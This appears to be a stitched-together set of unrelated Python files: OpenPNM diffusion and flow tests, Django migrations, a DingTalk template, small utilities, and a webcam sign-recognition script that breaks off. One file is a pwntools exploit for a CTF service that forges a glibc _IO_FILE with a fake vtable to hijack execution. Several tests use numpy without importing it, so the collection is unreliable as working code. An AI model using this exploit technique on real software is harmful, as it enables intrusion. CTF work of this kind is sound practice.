import scipy as sp
import OpenPNM
import pytest
def test_linear_solvers():
    """Check FickianDiffusion mass balance for several BC types and solvers."""
    # Thin 2-D slab network with Toray090 geometry, air phase, standard physics.
    pn = OpenPNM.Network.Cubic([1, 40, 30], spacing=0.0001)
    geom = OpenPNM.Geometry.Toray090(network=pn,
                                     pores=pn.pores(),
                                     throats=pn.throats())
    air = OpenPNM.Phases.Air(network=pn)
    phys_air = OpenPNM.Physics.Standard(network=pn,
                                        phase=air,
                                        pores=pn.pores(),
                                        throats=pn.throats())
    BC1_pores = pn.pores(labels=['left'])
    BC2_pores = pn.pores(labels=['right'])
    # Case 1: Dirichlet inlet / Dirichlet outlet, iterative GMRES solver.
    alg_1 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
    alg_1.set_boundary_conditions(bctype='Dirichlet',
                                  bcvalue=1,
                                  pores=BC1_pores)
    alg_1.set_boundary_conditions(bctype='Dirichlet',
                                  bcvalue=0,
                                  pores=BC2_pores)
    alg_1.run(iterative_solver='gmres')
    # Case 2: per-pore Neumann inlet, Dirichlet outlet, CG solver.
    alg_2 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
    alg_2.set_boundary_conditions(bctype='Neumann',
                                  bcvalue=-1e-11,
                                  pores=BC1_pores)
    alg_2.set_boundary_conditions(bctype='Dirichlet',
                                  bcvalue=0,
                                  pores=BC2_pores)
    alg_2.run(iterative_solver='cg')
    # Case 3: group Neumann inlet (total rate shared by the pore group).
    alg_3 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
    alg_3.set_boundary_conditions(bctype='Neumann_group',
                                  bcvalue=-3e-10,
                                  pores=BC1_pores)
    alg_3.set_boundary_conditions(bctype='Dirichlet',
                                  bcvalue=0,
                                  pores=BC2_pores)
    alg_3.run()
    # Case 4: same BCs as case 3, but driven via explicit setup() + solve().
    alg_4 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
    alg_4.set_boundary_conditions(bctype='Neumann_group',
                                  bcvalue=-3e-10,
                                  pores=BC1_pores)
    alg_4.set_boundary_conditions(bctype='Dirichlet',
                                  bcvalue=0,
                                  pores=BC2_pores)
    alg_4.setup()
    alg_4.solve()
    # Conservation: inlet and outlet rates must balance (to 1e-16),
    # and Neumann cases must reproduce the imposed boundary rates.
    assert round(sp.absolute(alg_1.rate(BC1_pores))[0], 16) == round(sp.absolute(alg_1.rate(BC2_pores))[0], 16)
    assert round(sp.absolute(alg_2.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_2['pore.'+air.name+'_bcval_Neumann']))[0]*len(BC1_pores), 16)
    assert round(sp.absolute(alg_3.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_3['pore.'+air.name+'_bcval_Neumann_group']))[0], 16)
    assert round(sp.absolute(alg_4.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_4['pore.'+air.name+'_bcval_Neumann_group']))[0], 16)
    # Summing per-pore rates ('single' mode) must equal the grouped rate.
    assert round(sp.absolute(sp.sum(alg_1.rate(BC1_pores,mode='single'))),16) == round(sp.absolute(alg_1.rate(BC1_pores))[0],16)
    assert round(sp.absolute(sp.sum(alg_2.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_2.rate(BC2_pores))[0],16)
    assert round(sp.absolute(sp.sum(alg_3.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_3.rate(BC2_pores))[0],16)
    assert round(sp.absolute(sp.sum(alg_4.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_4.rate(BC2_pores))[0],16)
def test_add_boundary():
    """add_boundaries() must create exactly the expected pore/throat labels."""
    net = OpenPNM.Network.Cubic(shape=[5, 5, 5])
    net.add_boundaries()
    expected = {'pore.back', 'pore.bottom', 'pore.top_boundary',
                'pore.right_boundary', 'throat.back_boundary',
                'throat.all', 'throat.bottom_boundary',
                'throat.front_boundary', 'pore.boundary',
                'throat.left_boundary', 'throat.conns',
                'throat.top_boundary', 'pore.back_boundary', 'pore.top',
                'pore.front_boundary', 'pore.all', 'pore.front',
                'pore.left_boundary', 'throat.boundary',
                'pore.bottom_boundary', 'throat.right_boundary',
                'pore.coords', 'pore.internal', 'pore.index', 'pore.left',
                'pore.right'}
    # Direct set equality: no key may be missing and none may be extra
    # (equivalent to asserting an empty symmetric difference).
    assert set(net.keys()) == expected
def test_open_air_diffusivity():
    """With near-unit pore/throat diameters the effective diffusivity of the
    network must equal the bulk air diffusivity (ratio == 1)."""
    pn = OpenPNM.Network.Cubic([5, 5, 5], spacing=1)
    pn.add_boundaries()
    # Internal pores/throats: nearly space-filling cubes so the pore network
    # imposes essentially no transport resistance.
    Ps = pn.pores('boundary', mode='not')
    Ts = pn.find_neighbor_throats(pores=Ps, mode='intersection', flatten=True)
    geom = OpenPNM.Geometry.Cube_and_Cuboid(network=pn, pores=Ps, throats=Ts)
    geom['pore.diameter'] = 0.999999
    geom['throat.diameter'] = 0.999999
    # Regenerate everything except the hand-set diameters.
    geom.regenerate(['pore.diameter', 'throat.diameter'], mode='exclude')
    # Boundary pores get the dedicated Boundary geometry.
    Ps = pn.pores('boundary')
    Ts = pn.find_neighbor_throats(pores=Ps, mode='not_intersection')
    boun = OpenPNM.Geometry.Boundary(network=pn,
                                     pores=Ps,
                                     throats=Ts,
                                     shape='cubes')
    air = OpenPNM.Phases.Air(network=pn)
    Ps = pn.pores()
    Ts = pn.throats()
    phys_air = OpenPNM.Physics.Standard(network=pn,
                                        phase=air,
                                        pores=Ps,
                                        throats=Ts)
    BC1_pores = pn.pores(labels=['top_boundary'])
    BC2_pores = pn.pores(labels=['bottom_boundary'])
    Diff = OpenPNM.Algorithms.FickianDiffusion(network=pn,
                                               phase=air)
    # Assign Dirichlet boundary conditions to top and bottom surface pores
    Diff.set_boundary_conditions(bctype='Dirichlet',
                                 bcvalue=0.6,
                                 pores=BC1_pores)
    Diff.set_boundary_conditions(bctype='Dirichlet',
                                 bcvalue=0.4,
                                 pores=BC2_pores)
    Diff.run()
    Diff.return_results()
    # Effective diffusivity normalized by the bulk value must be ~1.
    Diff_deff = Diff.calc_eff_diffusivity()/np.mean(air['pore.diffusivity'])
    assert np.round(Diff_deff, 3) == 1
def test_thermal_conduction():
    """Compare Fourier conduction on a 2-D network against the analytical
    steady-state solution for a sinusoidal inlet temperature.

    Uses numpy functions directly (np.sin, np.pi, np.sinh, np.reshape,
    np.amax) instead of the identical aliases formerly re-exported from the
    scipy namespace; those aliases were deprecated and have been removed in
    modern SciPy releases, so the sp.* spellings break on current installs.
    """
    # Generate Network and clean up boundaries (delete z-face pores)
    divs = [10, 50]
    Lc = 0.1  # cm
    pn = OpenPNM.Network.Cubic(shape=divs, spacing=Lc)
    pn.add_boundaries()
    pn.trim(pores=pn.pores(['top_boundary', 'bottom_boundary']))
    # Generate Geometry objects for internal and boundary pores
    Ps = pn.pores('internal')
    Ts = pn.throats()
    geom = OpenPNM.Geometry.GenericGeometry(network=pn,
                                            pores=Ps,
                                            throats=Ts)
    geom['pore.area'] = Lc**2
    geom['pore.diameter'] = Lc
    # Vanishing throat length / boundary diameter: conduction resistance is
    # dominated by the pores themselves.
    geom['throat.length'] = 1e-25
    geom['throat.area'] = Lc**2
    Ps = pn.pores('boundary')
    boun = OpenPNM.Geometry.GenericGeometry(network=pn, pores=Ps)
    boun['pore.area'] = Lc**2
    boun['pore.diameter'] = 1e-25
    # Create Phase object and associate with a Physics object
    Cu = OpenPNM.Phases.GenericPhase(network=pn)
    Cu['pore.thermal_conductivity'] = 1.0  # W/m.K
    phys = OpenPNM.Physics.GenericPhysics(network=pn,
                                          phase=Cu,
                                          pores=pn.pores(),
                                          throats=pn.throats())
    mod = OpenPNM.Physics.models.thermal_conductance.series_resistors
    phys.add_model(propname='throat.thermal_conductance', model=mod)
    phys.regenerate()  # Update the conductance values
    # Setup Algorithm object
    Fourier_alg = OpenPNM.Algorithms.FourierConduction(network=pn, phase=Cu)
    inlets = pn.pores('back_boundary')
    outlets = pn.pores(['front_boundary', 'left_boundary', 'right_boundary'])
    # Sinusoidal temperature profile on the inlet face, 50 K elsewhere.
    T_in = 30*np.sin(np.pi*pn['pore.coords'][inlets, 1]/5)+50
    Fourier_alg.set_boundary_conditions(bctype='Dirichlet',
                                        bcvalue=T_in,
                                        pores=inlets)
    Fourier_alg.set_boundary_conditions(bctype='Dirichlet',
                                        bcvalue=50,
                                        pores=outlets)
    Fourier_alg.run()
    Fourier_alg.return_results()
    # Calculate analytical solution over the same domain spacing
    Cu['pore.analytical_temp'] = 30*np.sinh(np.pi*pn['pore.coords'][:, 0]/5)/np.sinh(np.pi/5)*np.sin(np.pi*pn['pore.coords'][:, 1]/5) + 50
    b = Cu['pore.analytical_temp'][pn.pores(geom.name)]
    a = Cu['pore.temperature'][pn.pores(geom.name)]
    a = np.reshape(a, (divs[0], divs[1]))
    b = np.reshape(b, (divs[0], divs[1]))
    diff = a - b
    # Numerical and analytical fields must agree within 0.015 K everywhere.
    assert np.amax(np.absolute(diff)) < 0.015
def test_Darcy_alg():
    """Run StokesFlow twice (rate-driven and pressure-driven) and check that
    imposed boundary rates are reproduced and inlet/outlet rates balance."""
    # Generate Network and clean up some of boundaries
    divs = [1, 50, 10]
    Lc = 0.00004
    pn = OpenPNM.Network.Cubic(shape=divs, spacing=Lc)
    pn.add_boundaries()
    Ps = pn.pores(['front_boundary', 'back_boundary'])
    pn.trim(pores=Ps)
    # Generate Geometry objects for internal and boundary pores
    Ps = pn.pores('boundary', mode='not')
    Ts = pn.find_neighbor_throats(pores=Ps, mode='intersection', flatten=True)
    geom = OpenPNM.Geometry.Toray090(network=pn, pores=Ps, throats=Ts)
    Ps = pn.pores('boundary')
    Ts = pn.find_neighbor_throats(pores=Ps, mode='not_intersection')
    boun = OpenPNM.Geometry.Boundary(network=pn, pores=Ps, throats=Ts)
    # Create Phase object and associate with a Physics object
    air = OpenPNM.Phases.Air(network=pn)
    Ps = pn.pores()
    Ts = pn.throats()
    phys = OpenPNM.Physics.GenericPhysics(network=pn,
                                          phase=air,
                                          pores=Ps,
                                          throats=Ts)
    from OpenPNM.Physics import models as pm
    phys.add_model(propname='throat.hydraulic_conductance',
                   model=pm.hydraulic_conductance.hagen_poiseuille,
                   calc_pore_len=False)
    phys.regenerate()  # Update the conductance values
    # Setup Algorithm objects
    # Darcy1: fixed total inflow (Neumann_group) against a partial outlet.
    Darcy1 = OpenPNM.Algorithms.StokesFlow(network=pn, phase=air)
    inlets = pn.pores('bottom_boundary')
    # Use only the half of the top face below the mid-plane as outlet.
    Ps = pn.pores('top_boundary')
    outlets = Ps[pn['pore.coords'][Ps, 1] < (divs[1]*Lc/2)]
    P_out = 0  # Pa
    Q_in = 0.6667*(Lc**2)*divs[1]*divs[0]  # m^3/s
    Darcy1.set_boundary_conditions(bctype='Neumann_group',
                                   bcvalue=-Q_in,
                                   pores=inlets)
    Darcy1.set_boundary_conditions(bctype='Dirichlet',
                                   bcvalue=P_out,
                                   pores=outlets)
    Darcy1.run()
    Darcy1.return_results()
    print('pore pressure for Darcy1 algorithm:')
    print(air['pore.pressure'])
    # Darcy2: pressure-driven flow between full bottom and top faces.
    Darcy2 = OpenPNM.Algorithms.StokesFlow(network=pn, phase=air)
    inlets = pn.pores('bottom_boundary')
    outlets = pn.pores('top_boundary')
    P_out = 10  # Pa
    P_in = 1000  # Pa
    Darcy2.set_boundary_conditions(bctype='Dirichlet',
                                   bcvalue=P_in,
                                   pores=inlets)
    Darcy2.set_boundary_conditions(bctype='Dirichlet',
                                   bcvalue=P_out,
                                   pores=outlets)
    Darcy2.run()
    print('pore pressure for Darcy2 algorithm:')
    print(Darcy2['pore.'+air.name+'_pressure'])
    # Darcy's law: effective permeability from the computed flow rate.
    Q = -Darcy2.rate(inlets)
    K = Q*air['pore.viscosity'][0]*divs[2]*Lc/(divs[0]*divs[1]*Lc**2*(P_in-P_out))
    Vp = sp.sum(pn['pore.volume']) + sp.sum(pn['throat.volume'])
    Vb = sp.prod(divs)*Lc**3
    e = Vp/Vb
    print('Effective permeability: ', K, '- Porosity: ', e)
    # Darcy1 must reproduce the imposed group rate at the outlet.
    a = round(sp.absolute(Darcy1.rate(outlets))[0], 16)
    pore_prop = 'pore.'+air.name+'_bcval_Neumann_group'
    b = round(sp.absolute(sp.unique(Darcy1[pore_prop]))[0], 16)
    assert a == b
    # Darcy2 mass balance: inlet and outlet rates must be equal.
    a = round(sp.absolute(Darcy2.rate(inlets))[0], 16)
    b = round(sp.absolute(Darcy2.rate(outlets))[0], 16)
    assert a == b
|
/home/miaojian/miniconda3/lib/python3.7/_bootlocale.py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: cg错过
# time : 2017-12-08
class DataTemplate:
    """In-memory holder for monitoring output.

    Data produced by the monitor is no longer written to a txt file but kept
    in this template (i.e. in memory) and rendered as DingTalk text/markdown
    payloads or a plain string for e-mail.
    """

    def __init__(self, strDateTime, strServerName):
        """strDateTime: report timestamp; strServerName: reporting host tag
        (server-name field added 2018-04-09)."""
        self.dataForHour = ""
        self.dataForSecond = ""
        self.dataAll = ""
        self.strDateTime = strDateTime
        self.strServerName = strServerName

    def _payload_text(self):
        # Shared footer used by every renderer: report body followed by
        # "<server>-<timestamp>".  Extracted so the format lives in one place
        # instead of being repeated verbatim in all three create* methods.
        return self.dataAll + "> \r\r " + self.strServerName + '-' + self.strDateTime

    def createDictTextData(self):
        """Build and return a plain-text message dict (DingTalk 'text' type)."""
        return {
            "msgtype": "text",
            "text": {
                "content": self._payload_text()
            },
            "isAtAll": 'true'
        }

    def createMarkdownData(self):
        """Build and return a markdown message dict (DingTalk 'markdown' type)."""
        return {
            "msgtype": "markdown",
            "markdown": {
                "title": "监控服务",
                "text": "#### [监控服务]\n" + self._payload_text()
            },
            "at": {
                "isAtAll": 'true'
            }
        }

    def createMarkdownDataForEmail(self):
        """Return the raw payload string, for e-mail delivery."""
        return self._payload_text()
|
# Generated by Django 3.2.4 on 2021-06-09 01:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the avaliacoes app: reviews (Avaliacao), comments,
    and like join-tables for both."""

    initial = True

    dependencies = [
        ('itens', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Avaliacao',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('create_date', models.DateTimeField(auto_now=True, verbose_name='Data de Criação')),
                ('valor', models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], verbose_name='Avaliação')),
                ('avaliacao', models.CharField(max_length=200, null=True, verbose_name='Comentário')),
                ('likes_cont', models.IntegerField(default=0, verbose_name='Número Likes')),
                ('tipo', models.CharField(max_length=200, verbose_name='Tipo')),
                # A review points at exactly one of filme/livro/serie (others null).
                ('filme', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.filme')),
                ('livro', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.livro')),
                ('serie', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.serie')),
                ('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
            ],
            options={
                'verbose_name': 'Avaliação',
                'verbose_name_plural': 'Avaliações',
            },
        ),
        migrations.CreateModel(
            name='Comentario',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('data_criacao', models.DateTimeField(auto_now=True)),
                # Fixed: max_length must be an integer, not the string '1024' —
                # a str value breaks MaxLengthValidator comparisons at runtime.
                ('comentario', models.TextField(max_length=1024, verbose_name='Comentario')),
                ('avaliacao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.avaliacao', verbose_name='avaliacao')),
                ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Comentário',
                'verbose_name_plural': 'Comentários',
            },
        ),
        migrations.CreateModel(
            name='LikeComentario',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comentario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.comentario')),
                ('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
            ],
            options={
                'verbose_name': 'Like',
                'verbose_name_plural': 'Likes',
            },
        ),
        migrations.CreateModel(
            name='LikeAvaliacao',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('avaliacao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.avaliacao')),
                ('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
            ],
            options={
                'verbose_name': 'Like',
                'verbose_name_plural': 'Likes',
            },
        ),
    ]
|
from pwn import *
import sys
#config
context(os='linux', arch='i386')
context.log_level = 'debug'

FILE_NAME = "./chall"

# Comment-toggle trick: as written, the remote HOST/PORT pair below takes
# effect, while the local pair is swallowed by a throwaway triple-quoted
# string; moving the leading '#' between the two  """  markers flips which
# configuration is active.
#"""
HOST = "pwn.kosenctf.com"
PORT = 9003
"""
HOST = "localhost"
PORT = 7777
#"""

# Passing 'r' on the command line targets the remote service; the default
# is to spawn the local binary.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(HOST, PORT)
else:
    conn = process(FILE_NAME)

elf = ELF(FILE_NAME)

# Binary-relative offsets (PIE build): win() function, a writable global
# buffer, and the target file stream.
off_win = 0xa5a
off_buf = 0x202060
off_stream = 0x202260
def exploit():
    """Leak the binary base from the printed win() address, then send a fake
    _IO_FILE structure whose vtable slots all point at win() (FSOP-style
    attack).  NOTE: Python 2 script (pwntools v1 API, print statement).
    """
    conn.recvuntil("> = ")
    # The service prints the address of win(); use it to recover the PIE base
    # and from that the address of the global buffer our payload lands in.
    addr_win = int(conn.recvline(), 16)
    bin_base = addr_win - off_win
    addr_buf = bin_base + off_buf

    # Hand-crafted _IO_FILE: every field offset below matches glibc's struct
    # layout; buffer pointers all aim at addr_buf+0x150 inside our own data.
    fake_file = p64(0xfbad2498)  # _flags
    #fake_file = p64(0xfbad0498) # _flags
    fake_file += p64(addr_buf+0x150)  # _read_ptr
    fake_file += p64(addr_buf+0x150)  # _read_end
    fake_file += p64(addr_buf+0x150)  # _read_base
    fake_file += p64(addr_buf+0x150)  # _write_base
    fake_file += p64(addr_buf+0x150)  # _write_ptr
    fake_file += p64(addr_buf+0x150)  # _write_end
    fake_file += p64(addr_buf+0x150)  # _buf_base
    fake_file += p64(addr_buf+0x150)  # _buf_end
    fake_file += p64(0)*4  # hoge
    fake_file += p64(addr_buf)  # *_chain
    fake_file += p64(3)  # _fileno
    fake_file += p64(0)*2  # hoge
    fake_file += p64(addr_buf+0xe0)  # lock
    fake_file += p64(0xffffffffffffffff)  #
    fake_file += p64(0)  # hoge
    fake_file += p64(addr_buf)  # hoge
    fake_file += p64(0)*3  # hoge
    fake_file += p64(0xffffffff)
    fake_file += p64(0)*2  # hoge
    # Fake vtable lives at addr_buf+0x100 and is filled with win() pointers,
    # so any stream operation dispatched through it calls win().
    fake_file += p64(addr_buf+0x100)  # vtable
    fake_file += "\x00"*(0x100-len(fake_file))
    fake_file += p64(addr_win)*20
    fake_file += "\x00"*(0x200-len(fake_file))
    fake_file += p64(addr_buf)
    fake_file += p64(0)*5
    fake_file += p64(addr_buf)

    conn.sendline(fake_file)
    print hex(bin_base)
    conn.interactive()

if __name__ == "__main__":
    exploit()
|
import zmq
import os
from time import sleep
# -*-*config*-*-
work_ip = '0.0.0.0'  # accept connections on this IP
port = '18735'
channel = 'sms'  # channel used for sending messages
command = 'poweroff'  # command that will be issued to the system
mess_in = 'power off'  # message that must be received to trigger "command"
# -*-*config*-*-

context = zmq.Context()

# NOTE(review): the main loop is a stub — it only sleeps; the subscriber
# logic sketched below is still commented out, so the config above is unused.
while True:
    sleep(1)

# # Subscriber (client) example:
# from time import sleep
# import zmq
# context = zmq.Context()
# socket = context.socket(zmq.SUB)
# socket.connect('tcp://127.0.0.1:13555')
# # socket.setsockopt(zmq.SUBSCRIBE, [b'test', b'sms'])
# socket.subscribe('sms')
# socket.subscribe('ping')
# # socket.recv_multipart()
# socket.recv_multipart(flags=zmq.NOBLOCK)
# while True:
#     print(socket.recv_multipart())
# Generated by Django 2.2.1 on 2019-08-22 17:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the billing app: BillHeader (one per submission),
    Company (keyed by name), and BillLines (line items per header)."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='BillHeader',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_created', models.DateTimeField(auto_now_add=True)),
                # Null until the bill is actually submitted.
                ('date_submitted', models.DateTimeField(null=True)),
                ('submitted', models.BooleanField(default=False)),
                ('company_name', models.CharField(max_length=100)),
                ('street_address', models.CharField(default='123 Internet Street', max_length=100)),
                ('city', models.CharField(default='Downtown', max_length=100)),
                # Two-letter US state code; '' allowed as "unset".
                ('state', models.CharField(choices=[('AL', 'AL'), ('AK', 'AK'), ('AZ', 'AZ'), ('AR', 'AR'), ('CA', 'CA'), ('CO', 'CO'), ('CT', 'CT'), ('DE', 'DE'), ('FL', 'FL'), ('GA', 'GA'), ('HI', 'HI'), ('ID', 'ID'), ('IL', 'IL'), ('IN', 'IN'), ('IA', 'IA'), ('KS', 'KS'), ('KY', 'KY'), ('LA', 'LA'), ('ME', 'ME'), ('MD', 'MD'), ('MA', 'MA'), ('MI', 'MI'), ('MN', 'MN'), ('MS', 'MS'), ('MO', 'MO'), ('MT', 'MT'), ('NE', 'NE'), ('NV', 'NV'), ('NH', 'NH'), ('NJ', 'NJ'), ('NM', 'NM'), ('NY', 'NY'), ('NC', 'NC'), ('ND', 'ND'), ('OH', 'OH'), ('OK', 'OK'), ('OR', 'OR'), ('PA', 'PA'), ('RI', 'RI'), ('SC', 'SC'), ('SD', 'SD'), ('TN', 'TN'), ('TX', 'TX'), ('UT', 'UT'), ('VT', 'VT'), ('VA', 'VA'), ('WA', 'WA'), ('WV', 'WV'), ('WI', 'WI'), ('WY', 'WY'), ('', '')], default='CA', max_length=2)),
                ('phone', models.CharField(default='7601234567', max_length=10)),
                ('email', models.EmailField(default='billing@company.com', max_length=100)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Company',
            fields=[
                # Company name doubles as the primary key.
                ('name', models.CharField(max_length=100, primary_key=True, serialize=False)),
                ('street_address', models.CharField(default='123 Internet Street', max_length=100)),
                ('city', models.CharField(default='Downtown', max_length=100)),
                ('state', models.CharField(choices=[('AL', 'AL'), ('AK', 'AK'), ('AZ', 'AZ'), ('AR', 'AR'), ('CA', 'CA'), ('CO', 'CO'), ('CT', 'CT'), ('DE', 'DE'), ('FL', 'FL'), ('GA', 'GA'), ('HI', 'HI'), ('ID', 'ID'), ('IL', 'IL'), ('IN', 'IN'), ('IA', 'IA'), ('KS', 'KS'), ('KY', 'KY'), ('LA', 'LA'), ('ME', 'ME'), ('MD', 'MD'), ('MA', 'MA'), ('MI', 'MI'), ('MN', 'MN'), ('MS', 'MS'), ('MO', 'MO'), ('MT', 'MT'), ('NE', 'NE'), ('NV', 'NV'), ('NH', 'NH'), ('NJ', 'NJ'), ('NM', 'NM'), ('NY', 'NY'), ('NC', 'NC'), ('ND', 'ND'), ('OH', 'OH'), ('OK', 'OK'), ('OR', 'OR'), ('PA', 'PA'), ('RI', 'RI'), ('SC', 'SC'), ('SD', 'SD'), ('TN', 'TN'), ('TX', 'TX'), ('UT', 'UT'), ('VT', 'VT'), ('VA', 'VA'), ('WA', 'WA'), ('WV', 'WV'), ('WI', 'WI'), ('WY', 'WY'), ('', '')], default='CA', max_length=2)),
                ('phone', models.CharField(default='7601234567', max_length=10)),
                ('email', models.EmailField(default='billing@company.com', max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='BillLines',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.TextField(default='labor at $75/hour')),
                ('quantity', models.IntegerField()),
                # NOTE(review): max_digits=10000 is far beyond any realistic
                # price — likely meant to be a small value (e.g. 10); confirm
                # against the current models before changing the migration.
                ('unit_price', models.DecimalField(decimal_places=2, max_digits=10000)),
                ('header', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='billing.BillHeader')),
            ],
        ),
    ]
|
#!/usr/bin/python3
def isint(x):
    """Return True if int(x) succeeds, else False.

    Also catches TypeError so values int() rejects outright (None, lists,
    ...) report False instead of crashing — the original only caught
    ValueError, so isint(None) raised.
    """
    try:
        int(x)
        return True
    except (ValueError, TypeError):
        return False
def isfloat(x):
    """Return True if float(x) succeeds, else False.

    Also catches TypeError so values float() rejects outright (None, lists,
    ...) report False instead of crashing — the original only caught
    ValueError, so isfloat(None) raised.
    """
    try:
        float(x)
        return True
    except (ValueError, TypeError):
        return False
def isindex(name, index):
    """Return True if name[index] is a valid subscript, else False.

    Generalized beyond the original IndexError-only handling: mappings raise
    KeyError for missing keys and non-subscriptable objects raise TypeError,
    both of which previously escaped to the caller.
    """
    try:
        name[index]
        return True
    except (IndexError, KeyError, TypeError):
        return False
def single_input_float(prompt):
    """Prompt repeatedly until the user types a valid float, then return it.

    Shields callers from non-numeric input where a number is required.
    """
    while True:
        raw = input(prompt)
        if not isfloat(raw):
            continue
        return float(raw)
def single_input_int(prompt):
    """Prompt repeatedly until the user types a valid integer, then return it.

    Shields callers from non-numeric input where a number is required.
    """
    while True:
        raw = input(prompt)
        if not isint(raw):
            continue
        return int(raw)
def list_input_float(var):
    """Accumulate float inputs onto *var* (usually 0) until a non-number.

    Each valid float entered is added to the running total; the first entry
    that is not a valid float terminates input and the total is returned.
    """
    while True:
        entry = input("")
        if not isfloat(entry):
            return var
        var += float(entry)
def list_input_string():
    """Collect input lines until a blank line; return them as a list."""
    collected = []
    while True:
        entry = input("")
        if entry == "":
            return collected
        collected.append(entry)
|
## Python 3
# Project Euler #1: sum of the natural numbers below 1000 divisible by 3 or 5.
# A generator expression feeds sum() lazily, avoiding both the throwaway
# list(range(1000)) and the filter() wrapper the original materialized.
answer = sum(x for x in range(1000) if x % 3 == 0 or x % 5 == 0)
print("The answer is %d" % answer)
|
import git
from VersionDetermination.MergeDetector.MergeDetector import MergeDetector
from VersionDetermination.LastVersionDetector.LastVersionDetector import LastVersionDetector
# https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-log.html#_pretty_formats
class Main(object):
    """Entry object: opens a Git repository and prints its latest version.

    Wires up LastVersionDetector and MergeDetector for *repository*, then
    prints the detected major/minor/patch numbers.
    """

    def __init__(self, repository: str):
        self.__repository_path = repository
        self.__repository = git.Repo(repository)

        last_version = LastVersionDetector(repository)
        # Instantiated for its side effects only; the instance is discarded.
        MergeDetector(repository)

        print(last_version.major_version)
        print(last_version.minor_version)
        print(last_version.patch_version)
        pass
if __name__ == "__main__":
    # NOTE(review): hard-coded local repository path — adjust per machine.
    vs = Main("/home/uwe/com.grobbles.app.gridflow4")
|
from keras.models import model_from_json
import operator
import cv2
# Load the trained CNN (architecture from JSON, weights from HDF5).
json_file = open("model-bw.json", "r")
model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(model_json)
loaded_model.load_weights("model-bw.h5")
print("Loaded model from disk")

# Default webcam.
cap = cv2.VideoCapture(0)

# NOTE(review): this mapping is built but never read below — the display
# label comes from the `prediction` dict inside the loop instead.
categories = {0: 'ZERO',
              1: 'ONE',
              2: 'TWO',
              3: 'THREE',
              4: 'FOUR',
              5: 'FIVE',
              6: "SIX",
              7: "SEVEN",
              8: "EIGHT",
              9: "NINE",
              'A': "A",
              'B': "B",
              'C': "C",
              'D': "D",
              'E': "E",
              'F': "F",
              'G': "G",
              'H': "H",
              'I': "I",
              'J': "J",
              'K': "K",
              'L': "L",
              'M': "M",
              'N': "N",
              'O': "O",
              'P': "P",
              'Q': "Q",
              'R': "R",
              'S': "S",
              'T': "T",
              'U': "U",
              'V': "V",
              'W': "W",
              'X': "X",
              'Y': "Y",
              'Z': "Z"
              }

while True:
    _, frame = cap.read()
    # Mirror the frame so the on-screen view matches the user's movement.
    frame = cv2.flip(frame, 1)

    # Region of interest: a box in the upper-right quarter of the frame.
    x1 = int(0.7*frame.shape[1])
    y1 = 100
    x2 = frame.shape[1]-10
    y2 = int(0.5*frame.shape[1])
    cv2.rectangle(frame, (x1-1, y1-1), (x2+1, y2+1), (255,0,0) ,1)

    # Crop, downscale to the model's 64x64 input, grayscale, binarize.
    thresh = frame[y1:y2, x1:x2]
    thresh = cv2.resize(thresh, (64, 64))
    thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
    _, test_image = cv2.threshold(thresh, 120, 255, cv2.THRESH_BINARY)
    cv2.imshow("test", test_image)

    # Single-sample batch of shape (1, 64, 64, 1); the model outputs one
    # score per class, indexed in the order listed below.
